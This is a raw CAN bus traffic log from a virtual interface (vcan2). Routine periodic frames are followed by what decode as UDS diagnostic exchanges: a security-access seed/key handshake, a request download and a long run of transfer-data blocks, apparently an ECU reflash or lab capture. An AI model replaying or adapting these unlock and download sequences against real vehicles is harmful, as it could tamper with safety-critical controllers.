-(1315.631000) vcan2 52A#000037373737 -(1318.130000) vcan2 0F1#A50000400000 -(1320.714000) vcan2 137#0000000030000000 -(1323.183000) vcan2 1E1#00000400000000 -(1325.616000) vcan2 451#000000000000 -(1328.134000) vcan2 0F1#B10000400000 -(1330.677000) vcan2 139#0000000000000000 -(1333.072000) vcan2 1F3#000000 -(1335.623000) vcan2 4E1#4843373933343934 -(1338.143000) vcan2 0F1#8D0000400000 -(1340.738000) vcan2 32A#0000000000000000 -(1343.157000) vcan2 451#000000000000 -(1345.663000) vcan2 514#304C444436453733 -(1348.140000) vcan2 0F1#990000400000 -(1350.699000) vcan2 1E1#000004000104F0 -(1353.136000) vcan2 451#000000000000 -(1355.630000) vcan2 530#00000000 -(1358.145000) vcan2 0F1#A50000400000 -(1360.586000) vcan2 1F3#404000 -(1368.136000) vcan2 0F1#B10000400000 -(1370.775000) vcan2 1F1#050A000008000070 -(1373.134000) vcan2 451#000000000000 -(1378.147000) vcan2 0F1#8D0000400000 -(1380.704000) vcan2 1E1#000004000208E0 -(1383.165000) vcan2 3C9#0766000000000000 -(1388.146000) vcan2 0F1#990000400000 -(1390.663000) vcan2 160#1C2A2E8703 -(1393.146000) vcan2 1F3#808000 -(1395.695000) vcan2 451#000000000000 -(1398.165000) vcan2 0F1#A50000400000 -(1400.854000) vcan2 12A#122010FF000010A0 -(1408.155000) vcan2 0F1#B10000400000 -(1410.747000) vcan2 135#0400000200000000 -(1413.388000) vcan2 1E1#00000400030CD0 -(1415.655000) vcan2 451#000000000000 -(1418.177000) vcan2 0F1#8D0000400000 -(1420.758000) vcan2 137#0000000030000000 -(1423.111000) vcan2 1F3#C0C000 -(1428.164000) vcan2 0F1#990000400000 -(1430.719000) vcan2 139#0000000000000000 -(1433.160000) vcan2 451#000000000000 -(1438.167000) vcan2 0F1#A50000400000 -(1440.790000) vcan2 1E1#00000400000000 -(1443.245000) vcan2 32A#0000000000000000 -(1448.170000) vcan2 0F1#B10000400000 -(1450.663000) vcan2 1F3#000000 -(1453.188000) vcan2 451#000000000000 -(1458.178000) vcan2 0F1#8D0000400000 -(1468.181000) vcan2 0F1#990000400000 -(1470.742000) vcan2 1E1#000004000104F0 -(1473.326000) vcan2 1F1#050A000008000070 -(1475.679000) vcan2 451#000000000000 -(1478.198000) vcan2 0F1#A50000400000 -(1480.637000) vcan2 1F3#404000 -(1483.205000) vcan2 3C9#0766000000000000 -(1488.189000) vcan2 0F1#B10000400000 -(1490.692000) vcan2 160#1C2A2E8703 -(1493.216000) vcan2 451#000000000000 -(1498.198000) vcan2 0F1#8D0000400000 -(1500.845000) vcan2 12A#122010FF000010B0 -(1503.256000) vcan2 1E1#000004000208E0 -(1508.199000) vcan2 0F1#990000400000 -(1510.788000) vcan2 135#0400000200000000 -(1513.326000) vcan2 1F3#808000 -(1515.699000) vcan2 451#000000000000 -(1518.216000) vcan2 0F1#A50000400000 -(1520.801000) vcan2 137#0000000030000000 -(1523.291000) vcan2 3F1#00FF5F0C00FF0100 -(1528.203000) vcan2 0F1#B10000400000 -(1530.762000) vcan2 139#0000000000000000 -(1533.266000) vcan2 1E1#00000400030CD0 -(1535.709000) vcan2 451#000000000000 -(1538.228000) vcan2 0F1#8D0000400000 -(1540.716000) vcan2 1F3#C0C000 -(1543.283000) vcan2 32A#0000000000000000 -(1548.213000) vcan2 0F1#990000400000 -(1550.717000) vcan2 451#000000000000 -(1558.220000) vcan2 0F1#A50000400000 -(1560.787000) vcan2 1E1#00000400000000 -(1568.225000) vcan2 0F1#B10000400000 -(1570.862000) vcan2 1F1#050A000008000070 -(1573.173000) vcan2 1F3#000000 -(1575.727000) vcan2 451#000000000000 -(1578.246000) vcan2 0F1#8D0000400000 -(1580.747000) vcan2 3C9#0766000000000000 -(1588.233000) vcan2 0F1#990000400000 -(1590.736000) vcan2 160#1C2A2E8703 -(1593.307000) vcan2 1E1#000004000104F0 -(1595.790000) vcan2 451#000000000000 -(1598.250000) vcan2 0F1#A50000400000 -(1600.901000) vcan2 12A#122010FF00001080 -(1603.190000) vcan2 1F3#404000 -(1608.241000) vcan2 0F1#B10000400000 -(1610.830000) vcan2 135#0400000200000000 -(1613.411000) vcan2 451#000000000000 -(1618.247000) vcan2 0F1#8D0000400000 -(1620.843000) vcan2 137#0000000030000000 -(1623.306000) vcan2 1E1#000004000208E0 -(1628.246000) vcan2 0F1#990000400000 -(1630.806000) vcan2 139#0000000000000000 -(1633.201000) vcan2 1F3#808000 -(1635.752000) vcan2 451#000000000000 -(1638.268000) vcan2 0F1#A50000400000 -(1640.871000) vcan2 32A#0000000000000000 -(1648.258000) vcan2 0F1#B10000400000 -(1650.842000) vcan2 1E1#00000400030CD0 -(1653.275000) vcan2 451#000000000000 -(1658.267000) vcan2 0F1#8D0000400000 -(1660.715000) vcan2 1F3#C0C000 -(1668.268000) vcan2 0F1#990000400000 -(1670.905000) vcan2 1F1#050A000008000070 -(1673.261000) vcan2 451#000000000000 -(1678.271000) vcan2 0F1#A50000400000 -(1680.840000) vcan2 1E1#00000400000000 -(1683.292000) vcan2 3C9#0766000000000000 -(1688.376000) vcan2 0F1#B10000400000 -(1690.883000) vcan2 160#1C2A2E8703 -(1693.367000) vcan2 1F3#000000 -(1695.918000) vcan2 451#000000000000 -(1698.397000) vcan2 0F1#8D0000400000 -(1701.083000) vcan2 12A#122010FF00001090 -(1708.382000) vcan2 0F1#990000400000 -(1710.973000) vcan2 135#0400000200000000 -(1713.621000) vcan2 1E1#000004000104F0 -(1715.888000) vcan2 451#000000000000 -(1718.401000) vcan2 0F1#A50000400000 -(1720.990000) vcan2 137#0000000030000000 -(1723.341000) vcan2 1F3#404000 -(1728.392000) vcan2 0F1#B10000400000 -(1730.945000) vcan2 139#0000000000000000 -(1733.391000) vcan2 451#000000000000 -(1738.403000) vcan2 0F1#8D0000400000 -(1741.008000) vcan2 1E1#000004000208E0 -(1743.509000) vcan2 32A#0000000000000000 -(1748.402000) vcan2 0F1#990000400000 -(1750.873000) vcan2 1F3#808000 -(1753.404000) vcan2 451#000000000000 -(1758.407000) vcan2 0F1#A50000400000 -(1768.411000) vcan2 0F1#B10000400000 -(1770.971000) vcan2 1E1#00000400030CD0 -(1773.552000) vcan2 1F1#050A000008000070 -(1775.999000) vcan2 3F1#00FF5F0C00FF0100 -(1778.432000) vcan2 0F1#8D0000400000 -(1780.868000) vcan2 1F3#C0C000 -(1783.437000) vcan2 3C9#0766000000000000 -(1785.910000) vcan2 451#000000000000 -(1788.432000) vcan2 0F1#990000400000 -(1790.923000) vcan2 160#1C2A2E8703 -(1793.426000) vcan2 4C5#0000000000 -(1798.421000) vcan2 0F1#A50000400000 -(1801.080000) vcan2 12A#122010FF000010A0 -(1803.491000) vcan2 1E1#00000400000000 -(1805.927000) vcan2 451#000000000000 -(1808.440000) vcan2 0F1#B10000400000 -(1811.019000) vcan2 135#0400000200000000 -(1813.556000) vcan2 1F3#000000 -(1818.435000) vcan2 0F1#8D0000400000 -(1821.030000) vcan2 137#0000000030000000 -(1823.429000) vcan2 451#000000000000 -(1828.436000) vcan2 0F1#990000400000 -(1830.989000) vcan2 139#0000000000000000 -(1833.496000) vcan2 1E1#000004000104F0 -(1835.940000) vcan2 451#000000000000 -(1838.455000) vcan2 0F1#A50000400000 -(1840.952000) vcan2 1F3#404000 -(1843.520000) vcan2 32A#0000000000000000 -(1848.446000) vcan2 0F1#B10000400000 -(1850.959000) vcan2 451#000000000000 -(1858.455000) vcan2 0F1#8D0000400000 -(1861.012000) vcan2 1E1#000004000208E0 -(1868.453000) vcan2 0F1#990000400000 -(1871.095000) vcan2 1F1#050A000008000070 -(1873.404000) vcan2 1F3#808000 -(1875.951000) vcan2 451#000000000000 -(1878.471000) vcan2 0F1#A50000400000 -(1880.978000) vcan2 3C9#0766000000000000 -(1888.459000) vcan2 0F1#B10000400000 -(1890.969000) vcan2 160#1C2A2E8703 -(1893.558000) vcan2 1E1#00000400030CD0 -(1896.043000) vcan2 451#000000000000 -(1898.482000) vcan2 0F1#8D0000400000 -(1901.156000) vcan2 12A#122010FF000010B0 -(1903.433000) vcan2 1F3#C0C000 -(1908.470000) vcan2 0F1#990000400000 -(1911.059000) vcan2 135#0400000200000000 -(1913.640000) vcan2 451#000000000000 -(1918.475000) vcan2 0F1#A50000400000 -(1921.074000) vcan2 137#0000000030000000 -(1923.541000) vcan2 1E1#00000400000000 -(1928.480000) vcan2 0F1#B10000400000 -(1931.035000) vcan2 139#0000000000000000 -(1933.426000) vcan2 1F3#000000 -(1935.980000) vcan2 451#000000000000 -(1938.501000) vcan2 0F1#8D0000400000 -(1941.064000) vcan2 32A#0000000000000000 -(1948.490000) vcan2 0F1#990000400000 -(1951.139000) vcan2 1E1#000004000104F0 -(1953.496000) vcan2 451#000000000000 -(1958.493000) vcan2 0F1#A50000400000 -(1960.946000) vcan2 1F3#404000 -(1968.497000) vcan2 0F1#B10000400000 -(1971.139000) vcan2 1F1#050A000008000070 -(1973.494000) vcan2 451#000000000000 -(1978.502000) vcan2 0F1#8D0000400000 -(1979.724000) vcan2 101#FE021002FE021002 -(1981.067000) vcan2 1E1#000004000208E0 -(1983.526000) vcan2 3C9#0766000000000000 -(1988.502000) vcan2 0F1#990000400000 -(1990.982000) vcan2 160#1C2A2E8703 -(1993.485000) vcan2 1F3#808000 -(1996.114000) vcan2 451#000000000000 -(1998.523000) vcan2 0F1#A50000400000 -(2001.229000) vcan2 12A#122010FF00001080 -(2003.522000) vcan2 641#01501A3186418231 -(2008.515000) vcan2 0F1#B10000400000 -(2011.104000) vcan2 135#0400000200000000 -(2013.751000) vcan2 1E1#00000400030CD0 -(2016.019000) vcan2 451#000000000000 -(2018.536000) vcan2 0F1#8D0000400000 -(2021.117000) vcan2 137#0000000030000000 -(2023.467000) vcan2 1F3#C0C000 -(2026.110000) vcan2 3F1#00FF5F0C00FF0100 -(2028.537000) vcan2 0F1#990000400000 -(2031.078000) vcan2 139#0000000000000000 -(2033.518000) vcan2 451#000000000000 -(2038.528000) vcan2 0F1#A50000400000 -(2041.141000) vcan2 1E1#00000400000000 -(2043.639000) vcan2 32A#0000000000000000 -(2048.531000) vcan2 0F1#B10000400000 -(2051.010000) vcan2 1F3#000000 -(2053.536000) vcan2 451#000000000000 -(2058.540000) vcan2 0F1#8D0000400000 -(2060.444000) vcan2 101#FE021002FE021002 -(2068.538000) vcan2 0F1#990000400000 -(2071.103000) vcan2 1E1#000004000104F0 -(2073.684000) vcan2 1F1#050A000008000070 -(2076.037000) vcan2 451#000000000000 -(2078.557000) vcan2 0F1#A50000400000 -(2080.998000) vcan2 1F3#404000 -(2083.567000) vcan2 3C9#0766000000000000 -(2086.057000) vcan2 641#01501A3186418231 -(2088.568000) vcan2 0F1#B10000400000 -(2091.021000) vcan2 160#1C2A2E8703 -(2093.569000) vcan2 451#000000000000 -(2098.557000) vcan2 0F1#8D0000400000 -(2101.208000) vcan2 12A#122010FF00001090 -(2103.615000) vcan2 1E1#000004000208E0 -(2108.558000) vcan2 0F1#990000400000 -(2111.147000) vcan2 135#0400000200000000 -(2113.688000) vcan2 1F3#808000 -(2116.062000) vcan2 451#000000000000 -(2118.575000) vcan2 0F1#A50000400000 -(2121.160000) vcan2 137#0000000030000000 -(2128.566000) vcan2 0F1#B10000400000 -(2131.121000) vcan2 139#0000000000000000 -(2133.624000) vcan2 1E1#00000400030CD0 -(2136.064000) vcan2 451#000000000000 -(2138.589000) vcan2 0F1#8D0000400000 -(2141.062000) vcan2 1F3#C0C000 -(2143.298000) vcan2 101#FE012803FE012800 -(2143.658000) vcan2 32A#0000000000000000 -(2148.575000) vcan2 0F1#990000400000 -(2151.090000) vcan2 641#01681A3186418231 -(2207.192000) vcan2 101#FE01A203FE01A200 -(2221.098000) vcan2 641#02E2003186418231 -(2278.067000) vcan2 101#FE02A501FE02A501 -(2291.161000) vcan2 641#01E5003186418231 -(2347.941000) vcan2 101#FE02A503FE02A503 -(2605.377000) vcan2 241#0227013186418253 -(2611.267000) vcan2 641#046701D6C6418231 -(2625.512000) vcan2 101#FE013E4000604D40 -(2681.230000) vcan2 241#0427021238418253 -(2691.229000) vcan2 641#026702D6C6418231 -(2697.126000) vcan2 241#021AB01230000000 -(2701.230000) vcan2 641#035AB040C0000000 -(2707.008000) vcan2 241#021AC04030000000 -(2711.254000) vcan2 641#065AC000C0000000 -(2716.999000) vcan2 241#021ACB00C0000000 -(2721.211000) vcan2 641#065ACB00C0000000 -(2727.009000) vcan2 241#021ACC00C0000000 -(2731.221000) vcan2 641#065ACC00C0000000 -(2737.004000) vcan2 241#021AD000C0000000 -(2741.228000) vcan2 641#045AD04740000000 -(2803.759000) vcan2 241#0634000000139453 -(2811.253000) vcan2 641#037F3478446FC831 -(3366.134000) vcan2 641#0174 -(3422.745000) vcan2 101#FE013E4000604D40 -(3426.673000) vcan2 241#10333600FEDF15CD -(3426.871000) vcan2 641#300001 -(3427.103000) vcan2 241#2106000000000000 -(3431.863000) vcan2 241#22F7000000000000 -(3436.861000) vcan2 241#2323000000000000 -(3441.860000) vcan2 241#2434000000000000 -(3446.862000) vcan2 241#259D000000000000 -(3451.857000) vcan2 241#2636000000000000 -(3456.861000) vcan2 241#2764000000000000 -(3457.041000) vcan2 641#0176 -(3465.541000) vcan2 101#FE013E4000604D40 -(3469.528000) vcan2 241#10333600FEDF1438 -(3469.725000) vcan2 641#300001 -(3469.954000) vcan2 241#2164000000000000 -(3474.854000) vcan2 241#223D000000000000 -(3479.860000) vcan2 241#23F6000000000000 -(3484.857000) vcan2 241#2463000000000000 -(3489.859000) vcan2 241#25CA000000000000 -(3494.858000) vcan2 241#2677000000000000 -(3499.864000) vcan2 241#2738000000000000 -(3500.044000) vcan2 641#0176 -(3508.546000) vcan2 101#FE013E4000604D40 -(3512.531000) vcan2 241#10333600FEDF15A0 -(3512.728000) vcan2 641#300001 -(3512.962000) vcan2 241#2167000000000000 -(3517.859000) vcan2 241#2256000000000000 -(3522.855000) vcan2 241#2394000000000000 -(3527.858000) vcan2 241#248F000000000000 -(3532.862000) vcan2 241#25C5000000000000 -(3537.866000) vcan2 241#26E2000000000000 -(3542.863000) vcan2 241#2791000000000000 -(3543.044000) vcan2 641#0176 -(3551.415000) vcan2 101#FE013E4000604D40 -(3555.419000) vcan2 241#10333600FEDF12FD -(3555.617000) vcan2 641#300001 -(3555.845000) vcan2 241#21E0000000000000 -(3560.854000) vcan2 241#2213000000000000 -(3565.854000) vcan2 241#235B000000000000 -(3570.854000) vcan2 241#2484000000000000 -(3575.859000) vcan2 241#25D0000000000000 -(3580.857000) vcan2 241#260F000000000000 -(3585.856000) vcan2 241#27CF000000000000 -(3586.037000) vcan2 641#0176 -(3594.290000) vcan2 101#FE013E4000604D40 -(3598.280000) vcan2 241#10333600FEDF110E -(3598.478000) vcan2 641#300001 -(3598.716000) vcan2 241#2108000000000000 -(3603.857000) vcan2 241#2267000000000000 -(3608.861000) vcan2 241#2308000000000000 -(3613.865000) vcan2 241#2400000000000000 -(3618.860000) vcan2 241#2504000000000000 -(3623.862000) vcan2 241#2647000000000000 -(3628.860000) vcan2 241#2780000000000000 -(3629.038000) vcan2 641#0176 -(3637.295000) vcan2 101#FE013E4000604D40 -(3641.287000) vcan2 241#10333600FEDF14BF -(3641.483000) vcan2 641#300001 -(3641.713000) vcan2 241#21A6000000000000 -(3646.853000) vcan2 241#2238000000000000 -(3651.852000) vcan2 241#2320000000000000 -(3656.856000) vcan2 241#2410000000000000 -(3661.851000) vcan2 241#2566000000000000 -(3666.849000) vcan2 241#26C8000000000000 -(3671.853000) vcan2 241#2713000000000000 -(3672.031000) vcan2 641#0176 -(3680.174000) vcan2 101#FE013E4000604D40 -(3684.167000) vcan2 241#10333600FEDF12D0 -(3684.361000) vcan2 641#300001 -(3684.590000) vcan2 241#2139000000000000 -(3688.860000) vcan2 241#22AB000000000000 -(3693.859000) vcan2 241#2390000000000000 -(3698.861000) vcan2 241#24EB000000000000 -(3703.861000) vcan2 241#25B7000000000000 -(3708.860000) vcan2 241#26C9000000000000 -(3713.860000) vcan2 241#2731000000000000 -(3714.038000) vcan2 641#0176 -(3722.181000) vcan2 101#FE013E4000604D40 -(3726.173000) vcan2 241#10333600FEDF113B -(3726.371000) vcan2 641#300001 -(3726.609000) vcan2 241#2147000000000000 -(3730.861000) vcan2 241#2280000000000000 -(3735.867000) vcan2 241#2300000000000000 -(3740.858000) vcan2 241#2434000000000000 -(3745.866000) vcan2 241#2505000000000000 -(3750.867000) vcan2 241#2674000000000000 -(3755.863000) vcan2 241#2706000000000000 -(3756.041000) vcan2 641#0176 -(3765.049000) vcan2 101#FE013E4000604D40 -(3769.048000) vcan2 241#10333600FEDF11EF -(3769.247000) vcan2 641#300001 -(3769.476000) vcan2 241#2196000000000000 -(3773.854000) vcan2 241#2249000000000000 -(3778.854000) vcan2 241#2324000000000000 -(3783.855000) vcan2 241#24FC000000000000 -(3788.859000) vcan2 241#255B000000000000 -(3793.853000) vcan2 241#26E3000000000000 -(3798.856000) vcan2 241#2712000000000000 -(3799.039000) vcan2 641#0176 -(3807.976000) vcan2 101#FE013E4000604D40 -(3811.973000) vcan2 241#10333600FEDF1276 -(3812.170000) vcan2 641#300001 -(3812.398000) vcan2 241#214F000000000000 -(3816.859000) vcan2 241#220D000000000000 -(3821.859000) vcan2 241#2344000000000000 -(3826.854000) vcan2 241#2466000000000000 -(3831.856000) vcan2 241#25AA000000000000 -(3836.858000) vcan2 241#2694000000000000 -(3841.853000) vcan2 241#2722000000000000 -(3842.032000) vcan2 641#0176 -(3850.799000) vcan2 101#FE013E4000604D40 -(3854.793000) vcan2 241#10333600FEDF10E1 -(3854.989000) vcan2 641#300001 -(3855.223000) vcan2 241#21FF000000000000 -(3859.860000) vcan2 241#2205000000000000 -(3864.856000) vcan2 241#2359000000000000 -(3869.850000) vcan2 241#242C000000000000 -(3874.861000) vcan2 241#2500000000000000 -(3879.859000) vcan2 241#26C8000000000000 -(3884.858000) vcan2 241#2700000000000000 -(3885.037000) vcan2 641#0176 -(3893.804000) vcan2 101#FE013E4000604D40 -(3897.682000) vcan2 241#10333600FEDF12A3 -(3897.880000) vcan2 641#300001 -(3898.114000) vcan2 241#218F000000000000 -(3902.850000) vcan2 241#2298000000000000 -(3907.847000) vcan2 241#2342000000000000 -(3912.855000) vcan2 241#24BB000000000000 -(3917.850000) vcan2 241#252A000000000000 -(3922.854000) vcan2 241#263F000000000000 -(3927.850000) vcan2 241#271E000000000000 -(3928.030000) vcan2 641#0176 -(3936.681000) vcan2 101#FE013E4000604D40 -(3940.673000) vcan2 241#10333600FEDF132A -(3940.871000) vcan2 641#300001 -(3941.101000) vcan2 241#216B000000000000 -(3945.853000) vcan2 241#22B5000000000000 -(3950.848000) vcan2 241#2359000000000000 -(3955.850000) vcan2 241#2488000000000000 -(3960.854000) vcan2 241#2530000000000000 -(3965.851000) vcan2 241#2674000000000000 -(3970.855000) vcan2 241#27EB000000000000 -(3971.035000) vcan2 641#0176 -(3979.552000) vcan2 101#FE013E4000604D40 -(3983.536000) vcan2 241#101F3600FEDF1627 -(3983.734000) vcan2 641#300001 -(3983.960000) vcan2 241#214D5A4C2B2C2D36 -(3988.864000) vcan2 241#223035FFFFFFFFFF -(3993.871000) vcan2 241#23FFFFFFFFFFFFFF -(3998.855000) vcan2 241#24FFFFFFFF8A2977 -(3999.035000) vcan2 641#0176 -(4007.559000) vcan2 101#FE013E4000604D40 -(4011.544000) vcan2 241#10333600FEDF102D -(4011.741000) vcan2 641#300001 -(4011.978000) vcan2 241#2100000000000000 -(4016.856000) vcan2 241#2280000000000000 -(4021.856000) vcan2 241#2305000000000000 -(4026.851000) vcan2 241#247F000000000000 -(4031.857000) vcan2 241#25FD000000000000 -(4036.853000) vcan2 241#26B5000000000000 -(4041.856000) vcan2 241#27FE000000000000 -(4042.036000) vcan2 641#0176 -(4050.438000) vcan2 101#FE013E4000604D40 -(4054.441000) vcan2 241#10333600FEDF15FA -(4054.638000) vcan2 641#300001 -(4054.864000) vcan2 241#21B8000000000000 -(4059.845000) vcan2 241#22A6000000000000 -(4064.847000) vcan2 241#232E000000000000 -(4069.844000) vcan2 241#24CC000000000000 -(4074.848000) vcan2 241#255E000000000000 -(4079.850000) vcan2 241#26FF000000000000 -(4084.847000) vcan2 241#2763000000000000 -(4085.026000) vcan2 641#0176 -(4093.303000) vcan2 101#FE013E4000604D40 -(4097.299000) vcan2 241#10333600FEDF1087 -(4097.495000) vcan2 641#300001 -(4097.735000) vcan2 241#215F000000000000 -(4102.850000) vcan2 241#2280000000000000 -(4107.848000) vcan2 241#2300000000000000 -(4112.848000) vcan2 241#24EA000000000000 -(4117.849000) vcan2 241#2500000000000000 -(4122.855000) vcan2 241#2608000000000000 -(4127.846000) vcan2 241#2700000000000000 -(4128.027000) vcan2 641#0176 -(4136.304000) vcan2 101#FE013E4000604D40 -(4140.292000) vcan2 241#10333600FEDF14EC -(4140.488000) vcan2 641#300001 -(4140.720000) vcan2 241#21DF000000000000 -(4145.842000) vcan2 241#222A000000000000 -(4150.847000) vcan2 241#2365000000000000 -(4155.841000) vcan2 241#2426000000000000 -(4160.840000) vcan2 241#25E9000000000000 -(4165.846000) vcan2 241#2616000000000000 -(4170.846000) vcan2 241#27CA000000000000 -(4171.024000) vcan2 641#0176 -(4179.149000) vcan2 101#FE013E4000604D40 -(4183.177000) vcan2 241#10333600FEDF10B4 -(4183.373000) vcan2 641#300001 -(4183.611000) vcan2 241#2101000000000000 -(4187.849000) vcan2 241#2200000000000000 -(4192.844000) vcan2 241#23C5000000000000 -(4197.846000) vcan2 241#2477000000000000 -(4202.838000) vcan2 241#25CE000000000000 -(4207.847000) vcan2 241#266E000000000000 -(4212.843000) vcan2 241#270B000000000000 -(4213.021000) vcan2 641#0176 -(4221.190000) vcan2 101#FE013E4000604D40 -(4225.168000) vcan2 241#10333600FEDF1573 -(4225.366000) vcan2 641#300001 -(4225.600000) vcan2 241#21AF000000000000 -(4229.842000) vcan2 241#222F000000000000 -(4234.842000) vcan2 241#23FF000000000000 -(4239.843000) vcan2 241#241A000000000000 -(4244.841000) vcan2 241#2566000000000000 -(4249.842000) vcan2 241#2605000000000000 -(4254.842000) vcan2 241#27A0000000000000 -(4255.022000) vcan2 641#0176 -(4263.058000) vcan2 101#FE013E4000604D40 -(4267.039000) vcan2 241#10333600FEDF1465 -(4267.238000) vcan2 641#300001 -(4267.469000) vcan2 241#219F000000000000 -(4271.837000) vcan2 241#2206000000000000 -(4276.835000) vcan2 241#2390000000000000 -(4281.838000) vcan2 241#241F000000000000 -(4286.840000) vcan2 241#2555000000000000 -(4291.838000) vcan2 241#26FA000000000000 -(4296.841000) vcan2 241#274F000000000000 -(4297.021000) vcan2 641#0176 -(4305.977000) vcan2 101#FE013E4000604D40 -(4309.970000) vcan2 241#10333600FEDF1195 -(4310.167000) vcan2 641#300001 -(4310.397000) vcan2 241#217E000000000000 -(4314.834000) vcan2 241#2268000000000000 -(4319.840000) vcan2 241#23C2000000000000 -(4324.837000) vcan2 241#2400000000000000 -(4329.837000) vcan2 241#2518000000000000 -(4334.831000) vcan2 241#26AF000000000000 -(4339.842000) vcan2 241#27AF000000000000 -(4340.023000) vcan2 641#0176 -(4348.978000) vcan2 101#FE013E4000604D40 -(4352.800000) vcan2 241#10333600FEDF1249 -(4352.996000) vcan2 641#300001 -(4353.224000) vcan2 241#210F000000000000 -(4357.833000) vcan2 241#22F6000000000000 -(4362.837000) vcan2 241#2377000000000000 -(4367.835000) vcan2 241#24AA000000000000 -(4372.832000) vcan2 241#25D6000000000000 -(4377.834000) vcan2 241#2627000000000000 -(4382.841000) vcan2 241#27E7000000000000 -(4383.020000) vcan2 641#0176 -(4391.803000) vcan2 101#FE013E4000604D40 -(4395.793000) vcan2 241#10333600FEDF11C2 -(4395.993000) vcan2 641#300001 -(4396.229000) vcan2 241#21AF000000000000 -(4400.833000) vcan2 241#224C000000000000 -(4405.834000) vcan2 241#237F000000000000 -(4410.832000) vcan2 241#246F000000000000 -(4415.833000) vcan2 241#2589000000000000 -(4420.839000) vcan2 241#2615000000000000 -(4425.835000) vcan2 241#27D4000000000000 -(4426.015000) vcan2 641#0176 -(4434.698000) vcan2 101#FE013E4000604D40 -(4438.674000) vcan2 241#10333600FEDF1168 -(4438.872000) vcan2 641#300001 -(4439.108000) vcan2 241#2140000000000000 -(4443.840000) vcan2 241#2246000000000000 -(4448.833000) vcan2 241#2370000000000000 -(4453.829000) vcan2 241#248E000000000000 -(4458.835000) vcan2 241#2572000000000000 -(4463.828000) vcan2 241#26B2000000000000 -(4468.832000) vcan2 241#2763000000000000 -(4469.012000) vcan2 641#0176 -(4477.677000) vcan2 101#FE013E4000604D40 -(4481.547000) vcan2 241#10333600FEDF1492 -(4481.743000) vcan2 641#300001 -(4481.973000) vcan2 241#21CA000000000000 -(4486.829000) vcan2 241#22D5000000000000 -(4491.830000) vcan2 241#23D2000000000000 -(4496.828000) vcan2 241#2433000000000000 -(4501.828000) vcan2 241#25ED000000000000 -(4506.833000) vcan2 241#26F0000000000000 -(4511.833000) vcan2 241#27D3000000000000 -(4512.013000) vcan2 641#0176 -(4520.554000) vcan2 101#FE013E4000604D40 -(4524.546000) vcan2 241#10333600FEDF1546 -(4524.744000) vcan2 641#300001 -(4524.974000) vcan2 241#2154000000000000 -(4529.830000) vcan2 241#2245000000000000 -(4534.826000) vcan2 241#23D6000000000000 -(4539.829000) vcan2 241#240C000000000000 -(4544.829000) vcan2 241#2536000000000000 -(4549.828000) vcan2 241#2690000000000000 -(4554.828000) vcan2 241#279C000000000000 -(4555.010000) vcan2 641#0176 -(4563.430000) vcan2 101#FE013E4000604D40 -(4567.415000) vcan2 241#10333600FEDF121C -(4567.614000) vcan2 641#300001 -(4567.843000) vcan2 241#21EC000000000000 -(4572.823000) vcan2 241#225D000000000000 -(4577.835000) vcan2 241#233F000000000000 -(4582.824000) vcan2 241#2474000000000000 -(4587.822000) vcan2 241#25A9000000000000 -(4592.826000) vcan2 241#2672000000000000 -(4597.827000) vcan2 241#277F000000000000 -(4598.007000) vcan2 641#0176 -(4606.357000) vcan2 101#FE013E4000604D40 -(4610.302000) vcan2 241#10333600FEDF1000 -(4610.529000) vcan2 641#300001 -(4610.767000) vcan2 241#21E0000000000000 -(4615.832000) vcan2 241#2202000000000000 -(4620.830000) vcan2 241#2324000000000000 -(4625.833000) vcan2 241#2406000000000000 -(4630.833000) vcan2 241#2540000000000000 -(4635.833000) vcan2 241#260D000000000000 -(4640.826000) vcan2 241#2725000000000000 -(4641.004000) vcan2 641#0176 -(4649.300000) vcan2 101#FE013E4000604D40 -(4653.290000) vcan2 241#10333600FEDF1519 -(4653.486000) vcan2 641#300001 -(4653.718000) vcan2 241#219B000000000000 -(4658.821000) vcan2 241#222D000000000000 -(4663.827000) vcan2 241#230A000000000000 -(4668.831000) vcan2 241#24A0000000000000 -(4673.828000) vcan2 241#25F5000000000000 -(4678.822000) vcan2 241#2695000000000000 -(4683.813000) vcan2 241#27CC000000000000 -(4683.994000) vcan2 641#0176 -(4692.166000) vcan2 101#FE013E4000604D40 -(4696.170000) vcan2 241#10333600FEDF1384 -(4696.368000) vcan2 641#300001 -(4696.602000) vcan2 241#21D4000000000000 -(4701.807000) vcan2 241#2262000000000000 -(4706.807000) vcan2 241#2327000000000000 -(4711.809000) vcan2 241#2466000000000000 -(4716.816000) vcan2 241#25B3000000000000 -(4721.810000) vcan2 241#2646000000000000 -(4726.816000) vcan2 241#27FE000000000000 -(4726.994000) vcan2 641#0176 -(4735.157000) vcan2 101#FE013E4000604D40 -(4739.155000) vcan2 241#10333600FEDF13B1 -(4739.351000) vcan2 641#300001 -(4739.585000) vcan2 241#21FD000000000000 -(4744.809000) vcan2 241#225A000000000000 -(4749.806000) vcan2 241#23BA000000000000 -(4754.810000) vcan2 241#2466000000000000 -(4759.805000) vcan2 241#2500000000000000 -(4764.809000) vcan2 241#26A9000000000000 -(4769.815000) vcan2 241#27D9000000000000 -(4769.997000) vcan2 641#0176 -(4778.044000) vcan2 101#FE013E4000604D40 -(4782.034000) vcan2 241#10333600FEDF13DE -(4782.232000) vcan2 641#300001 -(4782.466000) vcan2 241#21FF000000000000 -(4786.804000) vcan2 241#22D9000000000000 -(4791.805000) vcan2 241#2382000000000000 -(4796.803000) vcan2 241#2454000000000000 -(4801.807000) vcan2 241#25E4000000000000 -(4806.800000) vcan2 241#2661000000000000 -(4811.810000) vcan2 241#276F000000000000 -(4811.990000) vcan2 641#0176 -(4820.963000) vcan2 101#FE013E4000604D40 -(4824.963000) vcan2 241#10333600FEDF140B -(4825.161000) vcan2 641#300001 -(4825.391000) vcan2 241#2157000000000000 -(4829.805000) vcan2 241#228A000000000000 -(4834.803000) vcan2 241#2333000000000000 -(4839.804000) vcan2 241#2444000000000000 -(4844.802000) vcan2 241#2520000000000000 -(4849.801000) vcan2 241#268B000000000000 -(4854.805000) vcan2 241#279A000000000000 -(4854.983000) vcan2 641#0176 -(4863.795000) vcan2 101#FE013E4000604D40 -(4867.772000) vcan2 241#10333600FEDF1357 -(4867.971000) vcan2 641#300001 -(4868.198000) vcan2 241#21DE000000000000 -(4872.808000) vcan2 241#228F000000000000 -(4877.802000) vcan2 241#23F2000000000000 -(4882.801000) vcan2 241#24EA000000000000 -(4887.801000) vcan2 241#2551000000000000 -(4892.801000) vcan2 241#26C9000000000000 -(4897.806000) vcan2 241#2732000000000000 -(4897.986000) vcan2 641#0176 -(4906.796000) vcan2 101#FE013E4000604D40 -(4910.781000) vcan2 241#10333600FEDF105A -(4910.976000) vcan2 641#300001 -(4911.212000) vcan2 241#2101000000000000 -(4915.815000) vcan2 